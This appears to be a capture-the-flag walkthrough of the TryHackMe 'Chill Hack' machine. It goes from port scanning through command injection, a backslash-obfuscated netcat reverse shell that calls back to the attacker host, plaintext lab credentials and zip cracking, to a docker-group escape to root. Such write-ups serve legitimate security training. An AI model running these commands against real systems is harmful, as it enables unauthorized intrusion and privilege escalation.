TryHackMe: Chill Hack

TryHackMe | Chill Hack

Initial foothold

1. Port scan

nmap -Pn <target ip>
nmap -Pn -p1000- <target ip>

There’re 3 open ports: 21, 22 and 80.

2. OS and service scan

nmap -A -p21,22,80 <target ip>

The OS is Ubuntu.

There’re 3 services:

• 21/tcp open ftp vsftpd 3.0.3 w/ anonymous login
• 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux;
• 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

3. Vuln scan

nmap --script vuln -p21,22,80 <target ip>

There’re discovered directotories on HTTP service:

/csss
/images/
/js/
/secret/

Service Enumeration

1. FTP on port 21 w/ anonymous login

Connect and download the file.

ftp <target ip>
username: anonymous
ls -la
get note.txt

Read the file

cat note.txt

There’re possible username, save them as users.txt. Another thing is, in some service, there may be some implemented filter.

2. SSH on port 22

Test the connection

ssh <target ip>

I can connect successfully.

3. HTTP on port 80

nikto scan

nikto -h http://<target ip>/

There’re discovered directory as same as vuln scan result.

Directory scan w/ gobuster

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<target ip>/ -x php,txt,html,sh,cgi,bak -q

Access the site

I accessed every pages untial I came across this directory, /secret .

Exploitation

1. Test the Comand function

• Ping command

At the attacker machince

tcpdump ip proto \\icmp -i tun0

At the target machine, test the ping command\

ping -c 10 <attacker ip>

Back to the attacker machine. The command injection worked as expected.

• Reverse shell

Create listener on port 443

rlwrap nc -lvp 443

Inject the reverse shell command

Reverse Shell Cheat Sheet

I will use this command.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> 443 >/tmp/f

I encountered w/ the filter as hinted in note.txt from FTP service.

Bypass the filter, I will use ‘\’ as the starting charactor.

r\m /t\m\p/f;m\k\f\i\f\o /t\m\p/f;c\a\t /t\m\p/f|/b\i\n/s\h -i 2>&1|n\c <attcker ip> 443 >/t\m\p/f

Back to listener, now I got the shell

Privilege Escalation

1. Get TTY shell

which python

The machine doesn't have python command.

Maybe this machine has python3

which python3
python3 -c 'import pty;pty.spawn("/bin/bash");'

Now I have TTY shell and current directory is /var/www/html/secret.

2. Explore directories

I came across another HTTP site’s directories in “/var/www”

I think it’s a hidden HTTP site and can be accessible by only this machine.

cat /var/www/files/index.php | less

I got MySQL credential.

Try to login as root, in case there’s re-using password.

su root
password: !@m+her00+@db

Failed!!!

3. Verify sudo

sudo -l

Use command

sudo /home/apaar/.helpline.sh

Failed!!!

Use command as apaar

sudo -u apaar /home/apaar/.helpline.sh

Trying to get shell by supplying /bin/bash

/bin/bash
whoami

Now I escalated to be apaar.

Verify sudo again

sudo -l

It’s the same command as www-data. If I supply /bin/bash as www-data, I still be apaar anyway.

Read user.txt

cd /home/apaar
ls -la
cat local.txt

Now I got the first flag.

4. Login to mysql

mysql -uroot '-p!@m+her00+@db'

show databases;

There’s webportal schema.

Get webportal’s tables.

use webportal;
show tables; -> users
select * from users;

I got credential of anurodh and apaar,

Crack hashes w/ crackstation

Try re-using password

su aurick
password: masterpassword
su anurodh
password: masterpassword
su apaar
password: dontaskdonttell

All failed!!!

5. Searching for hidden port and service

Since there’s hidden website stored in /var/www/files/. My suspicion is this machine may have hidden port.

Verify port

ss -tunpl

As suspected, there’s port no.9001.

HTTP can be configured to use different port instead of 80. The configuration is located in:

/etc/apache2/sites-enabled/

Verify

cd /etc/apache2/sites-enabled/
ls -la

cat 000-default.conf

6. Port-forwarding

Back to attacker machine, start ssh service

systemctl start ssh.socket
systemctl status ssh.socket

At the target machine, forward the port

ssh -R 9001:127.0.0.1:9001 <attacker user>@<attacker ip>

Access the site via attack machine

http://localhost:9001

Login w/ cracked credential from MySQL

username: Aurick
password: masterpassword

As hinted, I downloaded the image.

7. Steganography

Read file metadata

exiftool <filename>

Not much revealed

Extract hidden file w/ steghide

steghide extract -sf ./<file> 

I have backup.zip

Unzip

unzip backup.zip

I need password.

Find the password w/ fcrackzip

fcrackzip   -u -v -D -p rockyou.txt backup.zip

Unzip again and supply the password. Now I got source_code.php

cat source_code.php

There’s base64 string.

Decode w/ cyberchef

Try to login as anurodh

su anurodh
password: !d0ntKn0wmYp@ssw0rd

Verify user

id

I’m part of docker.

Exploit docker

docker run -v /:/mnt --rm -it alpine chroot /mnt sh
whoami

Now I’m root.

cd /root
ls -la

cat proof.txt